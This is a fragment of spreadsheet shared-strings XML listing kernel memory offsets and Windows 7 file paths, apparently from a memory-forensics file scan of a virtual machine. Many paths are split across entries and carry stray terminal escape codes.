    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\a</t>
  </si>
  <si>
    <t>ds[1].htm_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60dc08</t>
  </si>
  <si>
    <t>0xde60e420</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationClient\v4.0_4.0.0.0__31bf3856ad364e35\UIA</t>
  </si>
  <si>
    <t>utomationClie</t>
  </si>
  <si>
    <t>nt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60ec08</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\UIAutomationClient\3.0.0.0__31bf3856ad364e35\UIAutomationClient.dll</t>
  </si>
  <si>
    <t>0xde60f038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Mobile\2.0.0.0__b03f5f7f11d50a3a\System.Web.Mobile.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde60f850</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Mobile\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syst</t>
  </si>
  <si>
    <t>em.Web.Mobile</t>
  </si>
  <si>
    <t>.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60fd88</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP636E.tmp\System.Web.DynamicData.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde610038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Extensions.Design\3.5.0.0__31bf3856ad364e35\System.Web.E</t>
  </si>
  <si>
    <t>xtensions.Des</t>
  </si>
  <si>
    <t>ign.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde610850</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions.Design\v4.0_4.0.0.0__31bf3856ad</t>
  </si>
  <si>
    <t>.Web.Extens</t>
  </si>
  <si>
    <t>ions.D</t>
  </si>
  <si>
    <t>esign.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde610d88</t>
  </si>
  <si>
    <t>0xde610f18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\50ca5af8045399185c4b6c1257c3</t>
  </si>
  <si>
    <t>2b8c\Presenta</t>
  </si>
  <si>
    <t>tionBuildTa</t>
  </si>
  <si>
    <t>sks.ni</t>
  </si>
  <si>
    <t>0xde611260</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\</t>
  </si>
  <si>
    <t>System.Web.Ex</t>
  </si>
  <si>
    <t>tensions.dl</t>
  </si>
  <si>
    <t>0xde611608</t>
  </si>
  <si>
    <t>0xde6116c0</t>
  </si>
  <si>
    <t>\Windows\en-US\helppane.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde611a48</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Extensions\3.5.0.0__31bf3856ad364e35\System.Web.Extensio</t>
  </si>
  <si>
    <t>ns.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde612298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-directoryservices-ad</t>
  </si>
  <si>
    <t>am-dl_6c3018c</t>
  </si>
  <si>
    <t>c6f347ede.c</t>
  </si>
  <si>
    <t>df-ms_x001B_</t>
  </si>
  <si>
    <t>0xde612680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-dhcpservermigplugin-</t>
  </si>
  <si>
    <t>dl_0534ab06e1</t>
  </si>
  <si>
    <t>0ae139.cdf-</t>
  </si>
  <si>
    <t>ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde612a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-com-dtc-setup-dl_a3b</t>
  </si>
  <si>
    <t>468532c03dbe0</t>
  </si>
  <si>
    <t>.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde612d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnsv003.inf_x86_neutral_2011fa0a7f786266\prnsv00</t>
  </si>
  <si>
    <t>3.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde612e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-com-complus-setup-dl</t>
  </si>
  <si>
    <t>_1ee4026d5f58</t>
  </si>
  <si>
    <t>76ce.cdf-ms</t>
  </si>
  <si>
    <t>0xde613038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.RegularExpressions\v4.0_4.0.0.0__b03f5f7f1</t>
  </si>
  <si>
    <t>1d50a3a\Syste</t>
  </si>
  <si>
    <t>m.Web.Regul</t>
  </si>
  <si>
    <t>arExpr</t>
  </si>
  <si>
    <t>essions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde613340</t>
  </si>
  <si>
    <t>0xde613478</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\a37aec5d966b007c6e4b4f25f4db</t>
  </si>
  <si>
    <t>2bf6\System.M</t>
  </si>
  <si>
    <t>anagement.I</t>
  </si>
  <si>
    <t>nstrum</t>
  </si>
  <si>
    <t>entation.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde613728</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Routing\3.5.0.0__31bf3856ad364e35\System.Web.Routing.dll</t>
  </si>
  <si>
    <t>0xde614038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiVidCtl\6.1.0.0__31bf3856ad364e35\ehiVidCtl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614190</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8E8D.tmp\Microsoft.MediaCenter.Interop.dl</t>
  </si>
  <si>
    <t>0xde6142c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rasdlg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614660</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6148c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\oleaccrc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614ab0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiExtens\fe014aaa5b5b25c92fa6_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614d58</t>
  </si>
  <si>
    <t>0xde614e10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiiTv\4abaad7b6ad3861e06ca_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP75E8.tmp\AuditPolicyGPManagedStubs.Intero</t>
  </si>
  <si>
    <t>p.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde614f80</t>
  </si>
  <si>
    <t>0xde615b98</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde615d28</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAu</t>
  </si>
  <si>
    <t>tomationTypes</t>
  </si>
  <si>
    <t>0xde6161d8</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde616290</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.ApplicationServices\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>ad364e35\Syst</t>
  </si>
  <si>
    <t>em.Web.Appl</t>
  </si>
  <si>
    <t>icatio</t>
  </si>
  <si>
    <t>nServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde616348</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Abstractions\v4.0_4.0.0.0__31bf3856ad364e3</t>
  </si>
  <si>
    <t>5\System.Web.</t>
  </si>
  <si>
    <t>Abstraction</t>
  </si>
  <si>
    <t>0xde616400</t>
  </si>
  <si>
    <t>\Windows\System32\tdh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6164b8</t>
  </si>
  <si>
    <t>\Windows\System32\d3d11.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde616820</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-security-base-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde616b78</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Web.Mobile\33c60ad46aa4918e1f7f_x001B_[0K</t>
  </si>
  <si>
    <t>0xde616f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde617038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\appwiz.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6179a8</t>
  </si>
  <si>
    <t>0xde617a60</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehExtHost\051d203c99141490f3ac_x001B_[0K</t>
  </si>
  <si>
    <t>0xde617cd0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\aa404966f6e5a3d1f9d0_x001B_[0K</t>
  </si>
  <si>
    <t>0xde617f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\dfsvc\8b32d2bd9eda21179ca2_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6182f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP235C.tmp\Microsoft.MediaCenter.Mheg.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde618770</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_sfxplugins_5b043573249413c8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde618890</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE674.tmp\Microsoft-Windows-HomeGroupDiagn</t>
  </si>
  <si>
    <t>ostic.NetList</t>
  </si>
  <si>
    <t>Mgr.Interop</t>
  </si>
  <si>
    <t>.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde618df0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP788E.tmp\System.Windows.Presentation.dll_x001B_</t>
  </si>
  <si>
    <t>0xde619608</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\usercpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde619888</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\consent.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde619f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_86_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61a290</t>
  </si>
  <si>
    <t>0xde61a5e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9046.tmp\Microsoft.MediaCenter.Playback.d</t>
  </si>
  <si>
    <t>0xde61a850</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP49D8.tmp\System.Data.Services.Design.dll_x001B_</t>
  </si>
  <si>
    <t>0xde61ac20</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\srv.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61ada0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.ITVVM\6.1.0.0__31bf3856ad364e35\Microsoft.Med</t>
  </si>
  <si>
    <t>iaCenter.ITVV</t>
  </si>
  <si>
    <t>M.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61ae58</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEB39.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>.PolicyManage</t>
  </si>
  <si>
    <t>ment.Policy</t>
  </si>
  <si>
    <t>Manage</t>
  </si>
  <si>
    <t>r.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61af80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{96B5237F-7785-4607-98B</t>
  </si>
  <si>
    <t>7-E04F56EB273</t>
  </si>
  <si>
    <t>5}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61b310</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.JScript\cbce0b04e1d3a702b90b_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61b3c8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP91E0.tmp\Microsoft.MediaCenter.TV.Tuners.</t>
  </si>
  <si>
    <t>Interop.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde61ba90</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35\MMCFxCommon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61cbd0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\StikyNot.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61cf80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_homegroup_en-us_a38a598dd5f2b78b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61d478</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdyna.inf_x86_neutral_ae284d0cd38cec95\mdmdyna.</t>
  </si>
  <si>
    <t>inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61e038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\mcplayerinterop\6.1.0.0__31bf3856ad364e35\mcplayerinterop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61e4c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\BlbEvents.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61ea28</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\averfx2swtv_noavin.inf_x86_neutral_622d8263ea4677</t>
  </si>
  <si>
    <t>0a\averfx2swt</t>
  </si>
  <si>
    <t>v_noavin.in</t>
  </si>
  <si>
    <t>f_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61eb70</t>
  </si>
  <si>
    <t>0xde61eea8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msg711.acm.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61f038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.Shell\6.1.0.0__31bf3856ad364e35\Microsoft.Med</t>
  </si>
  <si>
    <t>iaCenter.Shel</t>
  </si>
  <si>
    <t>l.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61f388</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPCB1B.tmp\Microsoft.MediaCenter.iTv.Media.</t>
  </si>
  <si>
    <t>0xde61f4d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_device_en-us_3d982204ee3c99ad.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61f848</t>
  </si>
  <si>
    <t>0xde61fc30</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sdcpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde61ff80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Narrator\6.1.0.0__31bf3856ad364e35\Narrator.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde620038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\MiguiControls\1.0.0.0__31bf3856ad364e35\MIGUIControls.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6200f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPCDF6.tmp\Microsoft.ManagementConsole.dll_x001B_</t>
  </si>
  <si>
    <t>0xde620378</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Mcx2Dvcs\ab19cee380babb016a3d_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6204c0</t>
  </si>
  <si>
    <t>0xde620800</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\MSBuild\dfcc34b43e17493e58ee_x001B_[0K</t>
  </si>
  <si>
    <t>0xde620e20</t>
  </si>
  <si>
    <t>0xde6215d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rpcrt4.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde621f18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\AuxiliaryDisplayCpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde622aa0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Net\541e4951fec6a2e2505f_x001B_[0K</t>
  </si>
  <si>
    <t>0xde622d68</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6AAA.tmp\System.Web.Entity.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde622eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-au_wallpaper_6187684a82a84eda.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6236b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_fbee56ab048ab239.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6239c0</t>
  </si>
  <si>
    <t>0xde623a78</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_3f581be9a4c8cabd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde623bf8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.MediaCenter.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Med</t>
  </si>
  <si>
    <t>iaCenter.Inte</t>
  </si>
  <si>
    <t>rop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde623cf8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ssdpsrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde623e18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8BEE.tmp\Microsoft.MediaCenter.Shell.dll_x001B_</t>
  </si>
  <si>
    <t>0xde624c98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_branding_1728f5d8b15e5263.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde624e18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ddraw.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde625218</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\m</t>
  </si>
  <si>
    <t>svcm80.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde6253b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shdocvw.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde625678</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_networking_d061836896f4f29d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde625898</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.DurableInstancing\v4.0_4.0.0.0__31bf38</t>
  </si>
  <si>
    <t>56ad364e35\Sy</t>
  </si>
  <si>
    <t>stem.Runtim</t>
  </si>
  <si>
    <t>e.Dura</t>
  </si>
  <si>
    <t>bleInstancing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde626398</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tapisrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde626450</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_drivers_umdf_a531b5dc588477d3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6265f0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP93CB.tmp\Microsoft.MediaCenter.Sports.dll</t>
  </si>
  <si>
    <t>0xde6268f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugatherer_0000_046b5203f9ca3f14.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde626b68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_servicing_en-us_62939e786cb82928.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde627cb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_search_en-us_0b243b1f8544b909.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6285c8</t>
  </si>
  <si>
    <t>\Windows\System32\msimsg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde628778</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_branding_basebrd_9ee9a176c9fadab4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6292f0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\adfs_globals.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6294e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.0_wpf_en-us_22092b638fc9de75.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6295a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaxx002.inf_x86_neutral_47abc82fbe682ba5\wiaxx00</t>
  </si>
  <si>
    <t>2.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde629750</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_devicecenter_en-us_63ad620434e90fd4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde629c48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\EventViewer\4c659d91952107f0b23d_x001B_[0K</t>
  </si>
  <si>
    <t>0xde629d00</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Vsa\8.0.0.0__b03f5f7f11d50a3a\Microsoft.Vsa.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde629f80</t>
  </si>
  <si>
    <t>0xde62a670</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF262.tmp\Microsoft.Build.Framework.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde62ab18</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{BA51DE80-2B24-4B62-AB4</t>
  </si>
  <si>
    <t>8-5AB6B1611F1</t>
  </si>
  <si>
    <t>A}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62abd0</t>
  </si>
  <si>
    <t>0xde62af80</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62b038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_sonicresources_7e22c968e006c522.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62b9e8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaiwa5.inf_x86_neutral_d60cbdef6ff206a0\mdmaiwa</t>
  </si>
  <si>
    <t>5.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62bd68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\webio.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62bf80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Data.Entity\170223b9d9489487ceb6_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62c1a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35</t>
  </si>
  <si>
    <t>\Microsoft.Po</t>
  </si>
  <si>
    <t>werShell.Co</t>
  </si>
  <si>
    <t>mmands</t>
  </si>
  <si>
    <t>.Diagnostics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62c5d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFAC1.tmp\Microsoft.Build.Tasks.v3.5.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde62c720</t>
  </si>
  <si>
    <t>0xde62c9f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcom1.inf_x86_neutral_c239d64c485a0ad2\mdmcom1.</t>
  </si>
  <si>
    <t>0xde62ce80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_garden_6cea56938e5bd6b1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62d138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmzoom.inf_x86_neutral_15bd73698ecdea29\mdmzoom.</t>
  </si>
  <si>
    <t>0xde62d3b8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\91402d4b429e57b6d5006021889df</t>
  </si>
  <si>
    <t>e26\System.Se</t>
  </si>
  <si>
    <t>rviceModel.</t>
  </si>
  <si>
    <t>ni.dll</t>
  </si>
  <si>
    <t>.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62d6d0</t>
  </si>
  <si>
    <t>\Windows\System32\fde.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62da98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1956.tmp\System.Data.Entity.Design.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde62db50</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMa</t>
  </si>
  <si>
    <t>n.Management.</t>
  </si>
  <si>
    <t>0xde62dc08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP678B.tmp\Microsoft.PowerShell.GraphicalHo</t>
  </si>
  <si>
    <t>st.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62de10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF655.tmp\Microsoft.Build.Tasks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62dec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop\6.1.0.0__31b</t>
  </si>
  <si>
    <t>\Microsoft-</t>
  </si>
  <si>
    <t>s-HomeGroupDiagnostic.NetListMgr.Interop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62df80</t>
  </si>
  <si>
    <t>0xde62e3b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_aero_8b2c42561936b3f0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62e8f0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.En</t>
  </si>
  <si>
    <t>gine.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62eb10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP32A.tmp\Microsoft.GroupPolicy.Interop.dll</t>
  </si>
  <si>
    <t>0xde62ec48</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62ee60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_search_9d4b5385ff8f1ef3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde62ef80</t>
  </si>
  <si>
    <t>0xde62f038</t>
  </si>
  <si>
